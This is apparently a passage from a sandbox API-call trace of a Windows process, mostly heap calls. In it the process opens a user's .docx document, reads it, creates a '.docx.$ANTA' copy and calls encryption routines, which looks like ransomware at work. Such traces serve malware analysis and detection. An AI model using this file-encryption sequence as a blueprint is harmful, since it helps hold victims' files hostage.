0x41ac740 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ozbdkszpyqazc9.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.792] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.792] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.792] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0077.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431ded8 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431ded8 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.795] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\ozbdkszpyqazc9.docx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0077.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0077.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0077.800] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.801] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.805] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x3e27, lpOverlapped=0x0) returned 1 [0077.806] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13e27) returned 0x48f0048 [0077.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0077.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13e27) returned 0x4903e78 [0077.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.815] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13e27) returned 0x48f0048 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.816] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0077.816] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0077.816] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0077.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13e27) returned 0x48f0048 [0077.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13e27) returned 0x4917ca8 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.820] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.820] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0077.820] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: 